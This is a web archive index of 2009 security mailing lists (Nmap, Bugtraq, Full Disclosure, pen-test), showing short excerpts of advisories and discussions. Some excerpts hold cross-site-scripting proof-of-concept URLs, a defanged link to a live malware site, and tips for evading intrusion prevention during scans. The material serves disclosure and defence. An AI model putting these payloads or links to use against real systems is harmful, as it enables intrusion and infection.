SecLists.Org Security Mailing List Archive

Any hacker will tell you that the latest news and exploits are not found on any web site—not even Insecure.Org. No, the cutting edge in security research is and will continue to be the full disclosure mailing lists such as Bugtraq. Here we provide web archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below, or search them all:

Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects.

Re: [ncat] Thoughts about a --dns option? David Fifield (Nov 26)
I don't think something like this belongs in Ncat but it is very
interesting. In your explanation, the "DNS server" isn't just any old
DNS server, but a custom data-transfer program that understands the
protocol, correct?

I think this might work well implemented as a proxy server. That way
anything could use it as a tunnel.

David Fifield

Re: NFS script David Fifield (Nov 26)
I tested this with the nfsd on Mac OS X. It worked great over both TCP
and UDP. The packet documentation is good.

| nfs-showmount:
|_/Users 192.168.0.0

That's with this in /etc/exports:

/Users -network 192.168.0.0 -mask 255.255.0.0

I added your script in r16210. Well done! I made just a few minor
changes. I put the script in the safe category rather than intrusive,
because we're using the service exactly as it's designed. The comment
with the...

Re: SIP version detection script Patrik Karlsson (Nov 26)
I tested adding the sslports 5061 to the probe. It got me the same results but in a third of the time it took without
it.

//
Patrik

Re: NFS and Citrix scripts David Fifield (Nov 26)
On the contrary, the list is the right place to do development. Everyone
who's interested will see it when you post here.

David Fifield

Re: R: NMAP BUG ? David Fifield (Nov 26)
I can scan the host with -p 1-65535 and -p 1-8191 and I get the port
open. I can only think of one thing. Is there a firewall or router or
NAT device between you and the target? Some of those try to track TCP
connections, and they can become overwhelmed when there are too many,
and start dropping packets. That would explain why you get the port open
with a narrow port range but not a wide one.

David Fifield

DB2 udp probe Patrik Karlsson (Nov 26)
Hi,

I added a probe for 523/udp (DB2) that properly detects my DB2 servers.
Again, I'm not sure on the match, maybe it's to narrow, so I am submitting the signature.
HARDY-SRV01 is the name of the box and I'm running it against DB2 9.7 on linux.

SF-Port523-UDP:V=5.10BETA1%I=7%D=11/26%Time=4B0E6AC1%P=i386-apple-darwin10.2.0%r(ibm-db2,12A,"DB2RETADDR\0SQL09070\0HARDY-SRV01\0\0\0\0\0\0\0\0\0\0\0...

Re: NFS and Citrix scripts Patrik Karlsson (Nov 26)
OK, so while documenting the packets I also took the time to clean them up a bit.
Both packets now use NULL_AUTH which made the udp packet somewhat smaller.
The documentation is complete and based on Wiresharks dissesector.
When I'll implement authentication in the future all move the packet creation to a function.
David, like you said, at the moment it does not make much sense to do so.

I'll get back once I have the Citrix packets documented,...

Re: NFS and Citrix scripts David Fifield (Nov 25)
Thanks, Patrik, these look great! I don't have access to an NFS or
Citrix server so I want to repeat the call for people to test them. In
case you lost the message, they are online here:
http://seclists.org/nmap-dev/2009/q4/508

I have only one concern from looking at the scripts, and that is the
undocumented packet contents. You need to add comments explaining what
all those hex digits mean, and links to references if available. This is
the...

Re: SIP version detection script David Fifield (Nov 25)
This patch is looking great and I have committed it in r16209. I have
one question--is it worth adding "sslports 5061" to the TCP SIPOptions
probe? Does someone have that set up so they can test it?

David Fifield

Re: SIP version detection script David Fifield (Nov 25)
I tried doing it with a fallback, but fallbacks are protocol-specific so
a UDP probe can't refer to a TCP probe. Copying the tested match lines
sounds okay.

David Fifield

Re: POC Payloader dat Jay Fink (Nov 25)
I'm sure I could come up with something there. I had been meaning to
look at how unicornn scan does it.
I think msf3 has the payloads in source files too.

I snipped the rest but my response is *okay* :-)

This is a nice smaller scale project I think would be fun - well at
least for me - especially since there are not currently a lot of
payloads in in payload.cc right now (well - not yet!) and if I do it
right I can more or less modularize it...

Re: Nmap Crash David Fifield (Nov 25)
I can't reproduce this. Are you compiling from source? Try running "make
distclean" and compiling again. Also please paste in the complete output
so we can see where the error happens.

David Fifield

Re: POC Payloader dat David Fifield (Nov 25)
Thank you for starting work on this. Having the payloads in a separate
data file is indeed a goal. Not only would it make it possible to add
payloads without recompiling, but it would allow people to easily
disable payloads they don't like.

There are some things to be considered for the data file format. The
contents of the data file you sent are
DNS_STATUS_REQUEST "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
There is...

Citrix published application script Patrik Karlsson (Nov 25)
Hi all,

I fixed a bug in the Citrix script I posted yesterday. The script would only fetch the first UDP packet with the list
of applications. If a list is bigger (than my test lists) it will be split across several UDP packets which all need to
be fetched. I'm attaching the corrected script:

//Patrik_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev...

Re: [RFC] Detect certain Citrix application browsing services David Fifield (Nov 25)
Thanks, Thomas, for following up on this. I applied your patch and also
removed that last two bytes from the service probe match line.

David Fifield

Nmap Hackers — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.

Nmap 5.00 Released! Fyodor (Jul 16)
Hello everyone. I'm delighted to announce the release of Nmap 5.00!
This is the first major release since 4.50 in 2007, and includes about
600 significant changes since then! We consider this the most
important Nmap release since 1997, and we recommend that all current
users upgrade.

There are too many changes to list them all in this email, so here are
the top 5 improvements in Nmap 5:

1) The new Ncat tool aims to be your Swiss Army Knife...

Nmap news: stable release candidate 4.90RC1, SoC team, and new translations Fyodor (Jun 26)
Hi Folks. I'm pleased to announce some exciting Nmap news:

[=================Nmap 4.90RC1==================]

It has been nearly 10 months (and 11 dev releases) since 4.76, the
last stable Nmap release. And we've made many dramatic changes, so it
is time for a new stable version! I've posted a release
candidate--4.90RC1--on the Nmap download page:

http://nmap.org/download.html

Please test it out, and let us know if you find any problems...

Nmap 4.85BETA6 now avail w/Conficker detection Fyodor (Apr 01)
Hi Folks! In case you missed all the news reports yesterday, a couple
great researchers from the Honeynet Project (Tillmann Werner and Felix
Leder) and Dan Kaminsky came up with a way to remotely detect the
Conficker worm which has infected millions of machines worldwide.
Some say 15,000,000 machines infected, but that might just be
exaggerated AV-company BS for all I know. But there are clearly
millions of infections, and this massive botnet...

Nmap News: 4.84BETA4 release, Nmap book news, Summer of Code, Twitter, etc. Fyodor (Mar 27)
Hello everyone. We've seen 848 messages on nmap-dev this year, but
this is my first post to nmap-hackers. So I have a lot of exciting
Nmap news to fit into this one email!

[=================Nmap 4.85BETA4==================]

While the last release I posted to this list was 4.76 in September of
last year, we've had four beta releases since then with hundreds of
important and dramatic changes. I'm pretty happy with the latest
4.85BETA4 release,...

Nmap Network Scanning Book Released! Fyodor (Dec 09)
Nmap Hackers:

After promising you a book on Nmap for years, I'm delighted to finally
announce the release of Nmap Network Scanning! It contains everything
I've learned about network scanning from more than a decade of Nmap
development, plus some bad jokes and (over Time Warner's written
objections) pictures of Trinity hacking the Matrix :). Here is the
abstract:

Nmap Network Scanning is the official guide to the Nmap Security
Scanner, a...

Nmap News: 4.76 release, Defcon presentation online, Is port scanning legal? Fyodor (Sep 23)
Hi everyone. I'm happy to report that the Nmap 4.75 release (with
port frequencies, Zenmap topology, etc.) was a big success. But such
large exposure inevitably leads to bug discovery, so we've
released version 4.76 with about a dozen small fixes and stability
improvements. If 4.75 is working great for you, there is probably no
need to upgrade. But if you encountered problems, or if you are the
type who waits a couple weeks for stabilization...

Nmap 4.75 released Fyodor (Sep 08)
Hi Everyone. I'm delighted to report the release of Nmap 4.75, which
has almost 100 significant improvements since 4.68. Some which I'm
most excited about are:

o While Nmap stands for "Network Mapper", it hasn't been able to
actually draw you a map of the network--until now! Visit
http://nmap.org/book/zenmap-topology.html for details and pretty
pictures of Zenmap's new Scan Topology system.

o I spent much of this summer...

Nmap 4.68 release Fyodor (Jul 31)
Hi All. I'm happy to report that there have been several stable Nmap
releases since I mailed you about Nmap 4.60 in March. The latest
version is 4.68, and I think you'll like it (unless you still use
Win2K, which can be problematic due to IPv6 issues that we hope to
resolve in the next release). Before I give you the full list of 125
improvements, I'll start with a few highlights:

o Added a new --min-rate option that allows specifying a...

Lots of Nmap News Fyodor (Jul 31)
Hi All. I feel derelict for failing to post any Nmap news to this
nmap-hackers list in the last four months, but you can rest assured
that we've been busy on the project! For example, there have been
1,181 posts on the nmap-dev list (not all from me) since my March
nmap-hackers announcements. So you can always join that if you want a
constant flood of Nmap news :). There have also been several stable
Nmap releases since that time, great news...

Nmap accepting applications for Summer of Code developers Fyodor (Mar 24)
It may have taken me four months to send this year's first
nmap-hackers mail, but the second only took me four hours. I want to
let you all know that Nmap has been accepted for the fourth year
running to participate in the Google Summer of Code program. This
generous and innovative program provides $4,500 stipends to hundreds
of university students to create or enhance open source software.
Applications are only accepted for one week, until...

Nmap 4.60 and new movies page Fyodor (Mar 24)
Hi everyone. This is the first nmap-hackers message of the year, but
we haven't been slacking. The nmap-dev list has more than 500 posts
so far this quarter, and we've made many great improvements to Nmap
during the period.

Nmap-hackers is reserved for the most important Nmap news, but that
won't prevent me from starting out this message with something
frivolous :). I recently learned that Nmap was in not just one, but
two major motion...

Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!

[ GLSA 200911-05 ] Wireshark: Multiple vulnerabilities Alex Legler (Nov 25)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200911-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: Wireshark: Multiple vulnerabilities
Date: November...

[resent] [ GLSA 200911-04 ] dstat: Untrusted search path Robert Buchholz (Nov 25)
Due to an oversight on my part, the original email has not been signed.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200911-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity:...

[ GLSA 200911-03 ] UW IMAP toolkit: Multiple vulnerabilities Robert Buchholz (Nov 25)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200911-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High
Title: UW IMAP toolkit: Multiple vulnerabilities
Date:...

Re: Millions of PDF invisibly embedded with your internal disk paths Patrick Webster (Nov 25)
I agree. Discovering the local path may be considered a risk, but in
most cases the risk is nil.

Consider compiled binaries. They also leak paths of the developer's
compile environment (mainly PDB -
http://support.microsoft.com/kb/121366). E.g. My firefox.exe is:

e:\builds\moz2_slave\win32_build\build\obj-firefox\browser\app\firefox.pdb

This reminds me of the iPhone worm. Everyone knew about the default
root password years ago... it is not...

rPSA-2009-0156-1 sun-jdk sun-jre rPath Update Announcements (Nov 25)
rPath Security Advisory: 2009-0156-1
Published: 2009-11-24
Products:
rPath Appliance Platform Linux Service 2
rPath Linux 1
rPath Linux 2

Rating: Major
Exposure Level Classification:
Vulnerability
Updated Versions:
sun-jdk=conary.rpath.com () rpl:1/5.0u17-0.1-1
sun-jdk=conary.rpath.com () rpl:2/6u17-0.1-1
sun-jre=conary.rpath.com () rpl:1/5.0u17-0.1-1
sun-jre=conary.rpath.com () rpl:2/6u17-0.1-1

rPath Issue...

rPSA-2009-0155-1 httpd mod_ssl rPath Update Announcements (Nov 25)
rPath Security Advisory: 2009-0155-1
Published: 2009-11-24
Products:
rPath Appliance Platform Linux Service 2
rPath Linux 2

Rating: Major
Exposure Level Classification:
Indirect Deterministic Weakness
Updated Versions:
httpd=conary.rpath.com () rpl:2/2.2.9-4.3-1
mod_ssl=conary.rpath.com () rpl:2/2.2.9-4.3-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-3146

References:...

rPSA-2009-0154-1 httpd mod_ssl rPath Update Announcements (Nov 25)
rPath Security Advisory: 2009-0154-1
Published: 2009-11-24
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1

Rating: Major
Exposure Level Classification:
Indirect Deterministic Weakness
Updated Versions:
httpd=conary.rpath.com () rpl:1/2.0.63-0.9-1
mod_ssl=conary.rpath.com () rpl:1/2.0.63-0.9-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-3107...

[SECURITY] [DSA 1939-1] New libvorbis packages fix several vulnerabilities Giuseppe Iuculano (Nov 25)
------------------------------------------------------------------------
Debian Security Advisory DSA-1939-1 security () debian org
http://www.debian.org/security/ Giuseppe Iuculano
November 24, 2009 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package : libvorbis
Vulnerability : several
Problem type :...

Vulnerabilities in WP-Cumulus for WordPress MustLive (Nov 25)
Hello Bugtraq!

I want to warn you about security vulnerabilities in plugin WP-Cumulus for
WordPress.

These are Full path disclosure and Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=...

[security bulletin] HPSBMA02417 SSRT090031 rev.2 - HP Data Protector Express and HP Data Protector Express Single Server security-alert (Nov 25)
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01697543
Version: 2

HPSBMA02417 SSRT090031 rev.2 - HP Data Protector Express and HP Data Protector Express Single Server

Edition (SSE), Local Denial of Service (DoS), Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-05-13
Last Updated: 2009-11-18

Potential Security Impact: Local Denial of Service...

[USN-861-1] libvorbis vulnerabilities Marc Deslauriers (Nov 24)
===========================================================
Ubuntu Security Notice USN-861-1 November 24, 2009
libvorbis vulnerabilities
CVE-2008-2009, CVE-2009-3379
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem...

New Paper: MitM Attacks against the chipTAN comfort Online Banking System RedTeam Pentesting GmbH (Nov 24)
Abstract
========
ChipTAN comfort is a new system which is supposed to securely authorise online
banking transactions by means of a trusted device. It is assumed that chipTAN
comfort specifically protects against man-in-the-middle attacks. Such attacks are
currently putting bank customers who are using the iTAN system at risk. RedTeam
Pentesting examined chipTAN comfort and showed that even when using this sys-
tem, man-in-the-middle attacks can...

Executing arbitrary PHP code on OpenX <= 2.8.1 Moritz Naumann (Nov 24)
Hi,

OpenX adserver version 2.8.1 and lower is vulnerable to remote code
execution. To be exploited, this vulnerability requires banner / file
upload permissions, such as granted to the 'advertiser' and
'administrator' roles.

This vulnerability is caused by the (insecure) file upload mechanism of
affected OpenX versions. These would check magic bytes of an uploaded
file to determine its MIME type, and erroneously assume this
information to be...

XM Easy Personal FTP Server Remote DoS Vulnerability leinakesi (Nov 24)
Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: Dxmsoft
*******************************************************************************
Affected:

XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:

XM Easy Personal FTP Server failed to handle more than 2000 files or folders in

the root...

TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities leinakesi (Nov 24)
Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: TYPSoft

Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected

Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server
when

"APPE" and "DELE" commands are used in the same socket connection.

Details:
If you could log on the server successfully, take the...

Full Disclosure — An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.

Re: [funsec] nasty infection from following link if anyone is interested David Alanis (Nov 26)
Dragos Ruiu wrote:

I don't understand what is so funny about that or where you find the
humor in knowing some less intuitive user at your company can cause a
lot of damage to your network!?!?!

Randall is simply sharing the information he's gathered.

Here is the one message I received from an offshore colleague through my
facebook account. Note that since I no longer have a facebook (mostly
cause its a security risk) account and I suggested...

[SECURITY] [DSA-1940-1] New php5 packages fix several issues Stefan Fritsch (Nov 26)
------------------------------------------------------------------------
Debian Security Advisory DSA-1940-1 security () debian org
http://www.debian.org/security/ Stefan Fritsch
November 25, 2009 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package : php5
Vulnerability : multiple issues
Problem type : remote...

Re: Some shit going on in seclist Valdis . Kletnieks (Nov 26)
On Wed, 25 Nov 2009 03:10:04 +0530, Tyler Durten said:

Some lessons to learn:

1) Backups are important. If nothing else, buy a 500G USB SATA disk drive and
dump your machine to it once or twice a week.

2) Always mount a scratch monkey. (Bonus points for the silverbacks who get the
reference). A crash-n-bun test system, or at least a throwaway VMware with a
'revert' button.

3) If something is doing nothing but a 'system()' call on a string...

Re: more on that dramacrat (Nov 25)
well, all that really depends on the theory that the OP actually read it
prior to executing it.

2009/11/26 Andrew Farmer <andfarm () gmail com>

Re: more on that Andrew Farmer (Nov 25)
... which reads, in part:

I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this
isn't even marginally subtle.

Cacti 0.8.7e: Multiple security issues Moritz Naumann (Nov 25)
Cacti 0.8.7e and earlier versions are affected by multiple security
issues. Issues 1-4 are cross site scripting issues, issue 5 is a
priviledge escalation issue.

1. XSS 1

A HTTP GET request against the following URL will, on a web browser
with Javascript support, cause a dialog box saying '1' to be displayed:

http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert...

Re: need advice on adtmt cookie Rohit Patnaik (Nov 25)
As far as I can tell, admt is a name of an ad-delivery network, and the admt
that McAfee is detecting is the name of the tracking cookie that it uses.
As far as risk goes, I'd say it is no more risky than any other tracking
cookie. Delete it if you want, but it hasn't really caused any issues for
me.

--Rohit Patnaik

Re: UK jails schizophrenic for refusal to decrypt files maxigas (Nov 25)
From: Gregor Schneider <rc46fi () googlemail com>
Subject: Re: [Full-disclosure] UK jails schizophrenic for refusal to decrypt files
Date: Wed, 25 Nov 2009 12:41:48 +0100

Indeed, I seem to recall that in the decision of the German high court (the country where bureacrats are maybe the most
advanced in understanding technology) there was a reasoning to that effect, e.g. arguing that the contents of computers
fall under the freedom of...

Re: [funsec] nasty infection from following link if anyone is interested Dragos Ruiu (Nov 25)
Haha, and then you included his clickable link in your message
inclusion.
Tsk, Tsk. <chuckle>

cheers,
--dr

[SECURITY] [DSA 1941-1] New poppler packages fix several vulnerabilities Moritz Muehlenhoff (Nov 25)
------------------------------------------------------------------------
Debian Security Advisory DSA-1941-1 security () debian org
http://www.debian.org/security/ Moritz Muehlenhoff
November 25, 2009 http://www.debian.org/security/faq
------------------------------------------------------------------------

Package : poppler
Vulnerability : several
Problem type : local(remote)...

need advice on adtmt cookie RandallM (Nov 25)
Since using the virtual software McAfee web and email scanner I have
noticed a lot of blocks of the adtmt cookie (seen as an unwanted
program) but see alot of these blocks on FaceBook. I have googled but
only seem to find "bad", "how to get rid of adtmt.exe" ect. Could
someone shed light on the security risk of this? If I am blocking it
because I am surfing through the McAfee web scanner what is happening
or what are folks...

Re: {Spam?} [funsec] nasty infection from following link if anyone is interested RandallM (Nov 25)
Thanks Alex, had time to check it out back at the office. All is gone now!

Re: [funsec] nasty infection from following link if anyone is interested Juha-Matti Laurio (Nov 25)
Your modifications doesn't prevent your link to be clickable in all mail clients.
Please use methods
http : // and/or
archive1329101302 . heddasq

next time...

Juha-Matti

RandallM [randallm () fidmail com] kirjoitti:

nasty infection from following link if anyone is interested RandallM (Nov 25)
one of my sales people fell for a "someone posted a picture of you" emails.

Got a real nasty that came with, according to malwarebytes, "Pawnd.bot
and Backdoor.bot".
Havent checked it out yet but thought I would share it.

The link is this:
(REMOVETHISFIRSThttp://archive1329101302.heddasq.eu/photo-hosting/)

Re: Some shit going on in seclist Michael Holstein (Nov 25)
If you don't understand the code well enough to realize what it's doing,
then you deserve getting whacked for running some random shit you found
on an anonymous mailing list.

PS: "I send this file to have your advice", Loveletter.txt.vbs, etc. Oh
.. and I hear 4chan has a bunch of cool pictures you can rename from
.jpg to .js and get free porn for life.

(the only time I remember this actually being funny was when somebody
did one that...

Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.

RE: adding another defence layer against viruses/worms boaz.shunami (Nov 25)
Hi Juan,

I would advise your Client to either:

1. Have solid policy as to what sites are accessible/are not accessible
from his branches (can be enforced with bluecoat and the like...)
2. Segregate the network the branches have access to (kind of DMZ) from
his LAN using FW.
3. Give low level permissions to the branches on the core.

My 2c...

Thanks,

Boaz

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce ()...

scalable syscall proxying pleed (Nov 25)
Hi there,

some weeks ago i ve read papers about syscall proxying.
When i was looking for implementations, i just found very specific
code (e.g. at ueberwall.org) that could be used for minimal application.

Thats why i thought it could be funny to write my own, scalable syscall
proxy.
My concept includes:
- using ptrace SYSEMU to catch a process syscalls instead of
overwriting libc wrappers
- providing an interface to enable/disable...

Re: Dealing with port/vulnerability scans Michael Painter (Nov 25)
Tony Raboza wrote:

Chapter 1. Getting Started with Nmap
Legal Issues

http://nmap.org/book/legal-issues.html

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how your customers can tell if a site is secure. You will...

Re: Is snort an overkill for desktop only environment ? pleed (Nov 25)
Alexander Klimov wrote:

In my opinion NIDS on the host itself does not make the box more secure.
When deploying snort, you normaly want to know if there already has been a
_successful_ attack, because when connecting to the internet you re
always being
attacked but mostly without any affect to your system. In your case if
your desktop
is attacked successfully, i wouldnt trust the NIDS output anyway.
In addition snort is just helpfull if someone...

Re: When SPAMMERS Pay You ! Meta Junkie (Nov 25)
Shreyas Zare:

didn't actually come from PayPal.

Did you actually receive the ten cent deposit into your account?

If I was to wager, just based upon what I see here - I'd say you
didn't. This looks more like a fishing (aka phishing) attack. But,
if I'm wrong in my guess - please let me know!

- metajunkie

ps - I have an article or two regarding other phishing attacks at
http://cyber-jutsu.blogspot.com...

Re: Dealing with Scans (portscans, vulnerability, etc.) Aarón Mizrachi (Nov 25)
Indeed. That's right.

Not all ISP's take actions against it users doing port scanning. Depends on
internal policy and local legislation.

First of all, we must secure enough our sites/servers to prevent attacks, even
if the attacker know every detail about our platform, including usernames,
ports, OS, versions, hardware, and more.

After that, we have two options to _delay_ scanning:

1- Restrict the scan: You can automatically block certain...

Res: Dealing with port/vulnerability scans Leandro Marques (Nov 24)
Hello Tony,

I would enable those signatures, because you can check it in a better way to analyze real scans.

Depending on your IDS/IPS device, you can choose to block/log if it targets more than 10 ports, for example. You can
also check the kind of the event. A vuln scan can trigger a lot of signatures related to probes or some specific
protocol.

In additional, you can send an Abuse Letter to the owner of this IP.

I hope to be helpful....

Re: Is snort an overkill for desktop only environment ? Alexander Klimov (Nov 24)
Because every new software package you install is a potential
source of exploitable flaws, even more so if it is always
working and getting its inputs from network.

Re: Dealing with Scans (portscans, vulnerability, etc.) Jon Kibler (Nov 24)
Tony Raboza wrote:

First, your border firewall rules should block all inbound traffic that:
1) Is not targeted to a known service on a known IP address on your network.
2) Is not in response to traffic initiated from your network.
These two steps should cut down on a lot of the IDS noise.

Next, for services that you have exposed, run fail2ban (or similar) tool that
blocks morons trying to attack those services.

Then, report your firewall...

Security of information harvesting maork-from-ork (Nov 24)
Hi group,

My client wants to harvest information about his servers (done through a consultant, not internal people) using
TreeSize Professional.

http://www.jam-software.com/treesize/

My question is: Is this a safe way to scan servers to determine what type of files should be archived? Any of you say
flaws in that software?

Thanks!

Mork

------------------------------------------------------------------------
Securing Apache Web Server with...

adding another defence layer against viruses/worms Juan B (Nov 24)
Hi all,

I'm doing some security consulting for a client. this client have around 30 remote branches connected to his core. the
problem is that sometimes the AV fails to detect new viruses/worms coming from those branches so those viruses/worms
mess up his LAN.another problem is that the the client doesn't have much of control over the remote PCs in the
branches. so I thought about adding another layer of defence in which we will add an IPS...

Dealing with port/vulnerability scans Tony Raboza (Nov 24)
Hi,

I'm tuning my IDS and I'm thinking of taking out the portscan/web
vulnerability scan rules. Why? Because, yes - I know that somebody
may be scanning my network - but, what can I do about it?

1. Block the IP? But, what if its NAT - meaning only 1
workstation/user did the port scanning, I would be blocking all the
possibly valid users behind that IP.
2. Report it to their ISP or to them? Then what?

I want my IDS console not to be too...

Re: whole disk encryption on multi boot laptop Alexander Klimov (Nov 24)
The XP part is easy: TrueCrypt can encrypt in-place.

The modern way of Linux FDE is thru cryptsetup and LVM (you need an
unencrypted /boot partition). In theory, as far as there is enough
buffering, you can also encrypt in-place by dd: read from original
partition device and write to encrypted device mapped on the same
place, but in practice it is much safe and faster to get an external
HDD, copy Linux data to it, setup FDE for Linux, and copy...

Re: When SPAMMERS Pay You ! τ∂υƒιφ * (Nov 24)
Hi,

I have being doing my research on phishing lately and I tend to
analyze a lot of this emails. If your simply want to report any such
incident to pay pal forward the email to abuse () paypal com . Not sure
if they have a ticketing or live chat support.

You can read more about my research on
http://niiconsulting.com/checkmate/2009/11/05/a-phishy-story/ . I am
not promoting my write up :) It is just a reference.

Are toonel and freegate secure proxy servers? Ali Asghar Toraby Parizy (Nov 24)
Hi
Is it possible that my username and password have been sniffed while i
use toonel or freegate proxies?
In spite of SSL encryption, Is it rational to use this proxies when we
transmit our secure information by internet (for example PAYPAL
account)?
Maybe, over there, somebody sniffs username and passwords! Is it
possible? Does it ever happened before?

toonel.net
en.wikipedia.org/wiki/Freegate...

Penetration Testing — While this list is intended for "professionals", participants frequenly disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.

RE: Pentest lab box 16 gigs of ram Waddell, Sean (Nov 23)
Why not use VMware ESXi? It's free and has it's own OS. Then just load up your guest OS as needed.

SW
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of macubergeek
Sent: Wednesday, November 18, 2009 18:33
To: pen-test () securityfocus com
Subject: Pentest lab box 16 gigs of ram

All

I'm thinking of building a vmware target box for a pentest practice lab consisting of:

cheap...

RE: VideoJak 2.0 Released Abhijeet Hatekar (Nov 23)
Videojak is IP Video Hijacking tool which can be used to hijack IP Video calls and streams from video surveillance
camera. It supports SIP, SCCP and RTP protocols and can decode H264 media streams.
Videojak can play fake video content on IP video phones and cameras.
Please visit http://Videojak.sf.net for details.

Thanks and Regards,

Abhijeet Hatekar

When SPAMMERS Pay You ! Shreyas Zare (Nov 23)
Hi,

I dont know if people on this list know this, that's why I am mailing
it to know if you had such experience. I got this email from PayPal
(below). This is new way to SPAM, where the spammer sends you a eCheck
through PayPal, then later cancels the payment. The value on eCheck is
very small. But the spammer is able to get his mails into users inbox
through PayPal servers.

Its quite good idea, I tried to check out on PayPal site where I can...

Different ways to portscan IPS Vimal™ (Nov 23)
What are the different ways of port scanning the target when an IPS in placed.

Some of the methods I used are:

1. Delay the scan prob (nmap --scan-delay)

2. Integrating the scanner with TOR

Regards
Vimal

web : http://www.maestro-sec.com

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt...

Re: Pentest lab box 16 gigs of ram jsb (Nov 23)
Just thinking about using this OS is a bad start. esxi or xenserver
are much better. Then put anything you want on top...

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT certs require a full practical examination in...

Re: Pentest lab box 16 gigs of ram Lorenzo Nicolodi (Nov 23)
Hi jk,

I would suggest to use Ubuntu fot these reasons:

1) it works very well
2) you can use it for free
3) if you are interested in the guests (virtual) machines, the host OS
has to provide only the software layer for the virtualization, so
which OS you will use is not so important
4) I don't have a great experience with Windows Vista / Windows 7, I
have heard that the "home version"s have some troubles which are not
present in the...

Re: Windows Internationalization? Robert Portvliet (Nov 23)
It's been a bit, but I used to do work (remotely) on machines in
Singapore sometimes & I seem to recall everything being in (what I
assume was) Chinese.

As far as the internals go, I noticed some exploits in Metasploit have
'Windows XP Chinese' as a target, so I guess there is some difference
in the return addresses & such.

I see mention on foofus.net from 06/21/2007 about Chinese language
packs that states: "I know there is still...

Penetrating a MySql Server r00fsec (Nov 23)
Hi!!

So...I have a home server . It uses apache , php and MySql (5.0.77). It doesn't has any site on it but i create a page
with a simple sql injection Bug.
MySql server is running as root user. Now the goal is to take a shell in this server just for exercise . I know that it
is not so easy to find out there a server like this but im now starting to "play" with these things.

I have try some technics but i didnt got the shell yet :p...

Re: CEH or OSCP? Danux (Nov 23)
Always the same question from newbies!!! Dont feel that, I asked the
same long time ago.

If you wanna learn hundred of security tools go for CEH.
If you wanna learn how to crete basic hacking tools go for OSCP.

If you are a beginner definitely OSCP is not for you.

Using linux firewalls for PCI compliant infrastructure Siim Põder (Nov 23)
Hi

We are using linux-based servers as firewalls for PCI compliant
infrastructure. During audits it has been AOK so far but security
people internally have suggested that maybe a commercial product would
be better suited for PCI infrastructure (as it is pretty critical).

I'm personally very happy with the iptables firewalls - we can use all
the standard components for firewalls that we use for everything else
(including standard administration...

Re: CEH or OSCP? Jon Kibler (Nov 23)
Vaibhav Kaushal wrote:

http://www.offensive-security.com/contact.php

Re: Firewall Type Fingerprinting Chris Brenton (Nov 23)
If you know what to look for, absolutely. I have yet to see an automated
tool beyond what I've scripted myself. Check out question 13 below as
well as the answer, I've documented a portion of the process:

http://www.chrisbrenton.org/2009/07/test-your-network-security-skills/

Thought about releasing this as a tool but the potential is a bit
scary. ;-)

HTH,
Chris

